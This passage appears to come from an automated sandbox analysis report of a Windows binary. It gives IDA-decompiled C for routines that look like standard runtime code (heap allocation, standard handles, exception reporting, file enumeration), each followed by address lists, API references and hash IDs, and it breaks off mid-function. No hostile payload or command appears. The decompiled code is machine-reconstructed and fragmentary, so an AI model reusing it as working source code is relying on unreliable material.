							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0xac4194;
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}










        0x00ab6a6e
        0x00ab6a70
        0x00ab6a74
        0x00ab6a7d
        0x00ab6a88
        0x00ab6a98
        0x00ab6a9c
        0x00ab6a9f
        0x00ab6ab1
        0x00ab6aa1
        0x00ab6aa4
        0x00ab6aad
        0x00ab6aa6
        0x00ab6aa6
        0x00ab6aa8
        0x00ab6aa4
        0x00ab6ab3
        0x00ab6abb
        0x00ab6ac0
        0x00ab6acf
        0x00ab6ac6
        0x00ab6ac7
        0x00ab6ac7
        0x00ab6ad3
        0x00ab6af3
        0x00ab6af7
        0x00ab6afe
        0x00ab6b05
        0x00ab6b07
        0x00ab6b0a
        0x00ab6b0a
        0x00ab6ad5
        0x00ab6ad5
        0x00ab6ada
        0x00ab6ae0
        0x00ab6aeb
        0x00ab6aed
        0x00ab6aed
        0x00ab6ae2
        0x00ab6ae2
        0x00ab6ae2
        0x00ab6ae0
        0x00ab6a90
        0x00ab6a90
        0x00ab6a90
        0x00ab6b11
        0x00ab6b12
        0x00ab6b1e

        APIs
        • GetStdHandle.KERNEL32(000000F6), ref: 00AB6AB5
        • GetFileType.KERNELBASE(00000000), ref: 00AB6AC7
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: FileHandleType
        • String ID:
        • API String ID: 3000768030-0
        • Opcode ID: 44312b8f7d6f426817b612e65a466f121903b375cd927831d64066db3e1cd5f2
        • Instruction ID: 2d9f21da217e2b1da78f7c5366b9bd58a77ba8cda9c20cd4decd3eddb0382352
        • Opcode Fuzzy Hash: 44312b8f7d6f426817b612e65a466f121903b375cd927831d64066db3e1cd5f2
        • Instruction Fuzzy Hash: 2811DA3120474246DF308F3D8C886A2BABC9B56370B38471ED5B6E61F3D638DD869241
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB479B Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 451 ab479b-ab47a6 452 ab47a8-ab47b2 451->452 453 ab47b4-ab47ba 451->453 452->453 454 ab47e8-ab47f3 call ab501f 452->454 455 ab47bc-ab47bd 453->455 456 ab47d3-ab47e4 RtlAllocateHeap 453->456 460 ab47f5-ab47f7 454->460 455->456 457 ab47bf-ab47c6 call ab40a1 456->457 458 ab47e6 456->458 457->454 464 ab47c8-ab47d1 call ab74c4 457->464 458->460 464->454 464->456
        C-Code - Quality: 95%
        			E00AB479B(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xac4170, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00AB40A1();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00AB501F())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00AB74C4(_t15, _t16, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}











        0x00ab479b
        0x00ab47a1
        0x00ab47a6
        0x00ab47b4
        0x00ab47b4
        0x00ab47ba
        0x00ab47bc
        0x00ab47bc
        0x00ab47d3
        0x00ab47dc
        0x00ab47e4
        0x00000000
        0x00000000
        0x00ab47c4
        0x00ab47c6
        0x00ab47e8
        0x00ab47ed
        0x00ab47f3
        0x00000000
        0x00ab47f3
        0x00ab47c9
        0x00ab47ce
        0x00ab47cf
        0x00ab47d1
        0x00000000
        0x00000000
        0x00ab47d1
        0x00000000
        0x00ab47d3
        0x00ab47ac
        0x00ab47ad
        0x00ab47b2
        0x00000000
        0x00000000
        0x00000000

        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AB4CFF,00000001,00000364,?,00AB7370,?,00000004,00000000,?,?,?,00AB437B), ref: 00AB47DC
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: c6ac69dcef7bd2abe3d1f07c1bcc1c56182fbfc8642fb997c4081ea0d1a361e0
        • Instruction ID: c0bd75d233fb953e74f507119e43a9384eee2be33271e0372f5281f5811b2d9f
        • Opcode Fuzzy Hash: c6ac69dcef7bd2abe3d1f07c1bcc1c56182fbfc8642fb997c4081ea0d1a361e0
        • Instruction Fuzzy Hash: 27F0B431544624AB9B216B629D01BDA3B9CAB4A760F168152A80597593CF20DC92C2E0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB46B0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 467 ab46b0-ab46bc 468 ab46ee-ab46f9 call ab501f 467->468 469 ab46be-ab46c0 467->469 477 ab46fb-ab46fd 468->477 470 ab46d9-ab46ea RtlAllocateHeap 469->470 471 ab46c2-ab46c3 469->471 473 ab46ec 470->473 474 ab46c5-ab46cc call ab40a1 470->474 471->470 473->477 474->468 479 ab46ce-ab46d7 call ab74c4 474->479 479->468 479->470
        C-Code - Quality: 94%
        			E00AB46B0(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00AB501F())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xac4170, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00AB40A1();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00AB74C4(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}









        0x00ab46b0
        0x00ab46b6
        0x00ab46bc
        0x00ab46ee
        0x00ab46f3
        0x00ab46f9
        0x00000000
        0x00ab46f9
        0x00ab46c0
        0x00ab46c2
        0x00ab46c2
        0x00ab46d9
        0x00ab46e2
        0x00ab46ea
        0x00000000
        0x00000000
        0x00ab46ca
        0x00ab46cc
        0x00000000
        0x00000000
        0x00ab46cf
        0x00ab46d4
        0x00ab46d5
        0x00ab46d7
        0x00000000
        0x00000000
        0x00ab46d7
        0x00000000

        APIs
        • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00AB8CDE,?,00000000,?,00AB7370,?,00000004,00000000,?,?,?,00AB437B), ref: 00AB46E2
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 57b5c00c2262e2eaf88ce6e693d368af67ee2ae930881987326fca2d58d79e3a
        • Instruction ID: e9d0d8ddc88622a8429906e93988934bc34f6f616d43fe4381af3d796f4c10fd
        • Opcode Fuzzy Hash: 57b5c00c2262e2eaf88ce6e693d368af67ee2ae930881987326fca2d58d79e3a
        • Instruction Fuzzy Hash: 72E0ED35144624ABE6203B759E20BDA3BAC9B4B7A0F090221BC46D65D3EF20CC4182E4
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 00AB4D99 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 76%
        			E00AB4D99(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0xac3018; // 0x4c695d09
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00AB2747(_t41);
					_pop(_t62);
				}
				E00AB2CE0(_t67,  &_v804, 0, 0x50);
				E00AB2CE0(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00AB2747(_t57);
				}
				return E00AB29BB(_v8 ^ _t70);
			}




































        0x00ab4d99
        0x00ab4d99
        0x00ab4d99
        0x00ab4d99
        0x00ab4da4
        0x00ab4da9
        0x00ab4dab
        0x00ab4db3
        0x00ab4db5
        0x00ab4db8
        0x00ab4dbd
        0x00ab4dbd
        0x00ab4dc9
        0x00ab4ddc
        0x00ab4dea
        0x00ab4df0
        0x00ab4df6
        0x00ab4dfc
        0x00ab4e02
        0x00ab4e08
        0x00ab4e0e
        0x00ab4e14
        0x00ab4e1a
        0x00ab4e20
        0x00ab4e27
        0x00ab4e2e
        0x00ab4e35
        0x00ab4e3c
        0x00ab4e43
        0x00ab4e4a
        0x00ab4e4b
        0x00ab4e54
        0x00ab4e5a
        0x00ab4e5d
        0x00ab4e63
        0x00ab4e70
        0x00ab4e79
        0x00ab4e82
        0x00ab4e8b
        0x00ab4e99
        0x00ab4e9b
        0x00ab4eb0
        0x00ab4ebc
        0x00ab4ebf
        0x00ab4ec4
        0x00ab4ed3

        APIs
        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AB4E91
        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AB4E9B
        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AB4EA8
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$DebuggerPresent
        • String ID: ]iL
        • API String ID: 3906539128-4085116960
        • Opcode ID: ce8ae586833aba35fd4efbf588e3aaea851044772a6bcb1afccd8e1900290b43
        • Instruction ID: 7d507d22a7d2f986a604c781b14a6c06d1afc15c465a5be547dbdf2601595461
        • Opcode Fuzzy Hash: ce8ae586833aba35fd4efbf588e3aaea851044772a6bcb1afccd8e1900290b43
        • Instruction Fuzzy Hash: 973195759012289BCB61DF64DD897DDBBB8BF08310F5042DAE41CA7262E7749B858F44
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB51DA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
        Download Yara Rule
        C-Code - Quality: 72%
        			E00AB51DA(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E00AB479B(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E00AB874B(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E00AB5419(_a16, _t101, __eflags, _t111);
							E00AB4676(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E00AB874B(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00AB4F73();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0xac3018; // 0x4c695d09
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E00AB87A0(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E00AB2CE0(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00AB51DA(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E00AB8300(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E00AB5032);
									}
								} else {
									_push(_t55);
									_t57 = E00AB51DA(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E00AB51DA(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E00AB29BB(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}















































        0x00ab51df
        0x00ab51e0
        0x00ab51e3
        0x00ab51e3
        0x00ab51e6
        0x00ab51e6
        0x00ab51e8
        0x00ab51e9
        0x00ab51f2
        0x00ab51f3
        0x00ab51f6
        0x00ab51f9
        0x00ab51fe
        0x00ab5205
        0x00ab5206
        0x00ab5207
        0x00ab520a
        0x00ab5214
        0x00ab5217
        0x00ab5218
        0x00ab521a
        0x00ab522e
        0x00ab522e
        0x00ab5231
        0x00ab523b
        0x00ab5240
        0x00ab5243
        0x00ab5245
        0x00000000
        0x00ab5247
        0x00ab524b
        0x00ab5254
        0x00ab525a
        0x00000000
        0x00ab525d
        0x00ab521c
        0x00ab521c
        0x00ab5222
        0x00ab5227
        0x00ab522a
        0x00ab522c
        0x00ab5263
        0x00ab5265
        0x00ab5266
        0x00ab5267
        0x00ab5268
        0x00ab5269
        0x00ab526a
        0x00ab526f
        0x00ab5273
        0x00ab5275
        0x00ab527b
        0x00ab5282
        0x00ab5285
        0x00ab5288
        0x00ab5289
        0x00ab528c
        0x00ab528d
        0x00ab5290
        0x00ab5291
        0x00ab52b2
        0x00ab52b2
        0x00ab52b4
        0x00000000
        0x00000000
        0x00ab5299
        0x00ab529b
        0x00ab529d
        0x00ab529f
        0x00ab52a1
        0x00ab52a3
        0x00ab52a5
        0x00ab52b0
        0x00000000
        0x00ab52b0
        0x00ab52a5
        0x00ab52a1
        0x00000000
        0x00ab529d
        0x00ab52b6
        0x00ab52b8
        0x00ab52bb
        0x00ab52d4
        0x00ab52d4
        0x00ab52d6
        0x00ab52d9
        0x00ab52e9
        0x00ab52eb
        0x00ab52eb
        0x00ab52db
        0x00ab52db
        0x00ab52de
        0x00000000
        0x00ab52e0
        0x00ab52e0
        0x00ab52e3
        0x00000000
        0x00ab52e5
        0x00ab52e5
        0x00ab52e5
        0x00ab52e3
        0x00ab52de
        0x00ab52f1
        0x00ab52f9
        0x00ab52fd
        0x00ab530b
        0x00ab5310
        0x00ab5325
        0x00ab5327
        0x00ab532d
        0x00ab5330
        0x00ab5362
        0x00ab5362
        0x00ab5364
        0x00ab5367
        0x00ab536d
        0x00ab536d
        0x00ab5374
        0x00ab538e
        0x00ab538e
        0x00ab539d
        0x00ab53a2
        0x00ab53a5
        0x00ab53a7
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00ab5376
        0x00ab5376
        0x00ab537c
        0x00ab537e
        0x00000000
        0x00ab5380
        0x00ab5380
        0x00ab5383
        0x00000000
        0x00ab5385
        0x00ab5385
        0x00ab538c
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00ab538c
        0x00ab5383
        0x00ab537e
        0x00000000
        0x00ab53a9
        0x00ab53b1
        0x00ab53b7
        0x00ab53b9
        0x00ab53b9
        0x00ab53c1
        0x00ab53c6
        0x00ab53ce
        0x00ab53d1
        0x00ab53d3
        0x00ab53e7
        0x00ab53ec
        0x00ab5332
        0x00ab5332
        0x00ab5336
        0x00ab533e
        0x00ab533e
        0x00ab533e
        0x00ab5340
        0x00ab5343
        0x00ab5346
        0x00ab5346
        0x00ab52bd
        0x00ab52c0
        0x00ab52c2
        0x00000000
        0x00ab52c4
        0x00ab52c4
        0x00ab52ca
        0x00ab52cf
        0x00ab52c2
        0x00ab5353
        0x00ab535e
        0x00000000
        0x00000000
        0x00000000
        0x00ab522c
        0x00ab5200
        0x00ab5202
        0x00ab525e
        0x00ab5262
        0x00ab5262
        0x00000000

        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID:
        • String ID: ]iL$.
        • API String ID: 0-1155455829
        • Opcode ID: 827799c2969346a33addeb5b3585b0a649b565dec7c4c3602534e6a12f8e8db3
        • Instruction ID: a7e33e062fd99d81d8f018dbcc7c50d3b7802bd478d50eb9b32a6a64386cad3d
        • Opcode Fuzzy Hash: 827799c2969346a33addeb5b3585b0a649b565dec7c4c3602534e6a12f8e8db3
        • Instruction Fuzzy Hash: C131E471D00609AFCB249F79DC89FFA7BBDEB85314F1402A8F81997252E6319E458B50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB928E Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
        Download Yara Rule
        C-Code - Quality: 83%
        			E00AB928E(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0xac3018; // 0x4c695d09
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = E00AB914F(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E00AB914F(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E00AB46B0(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
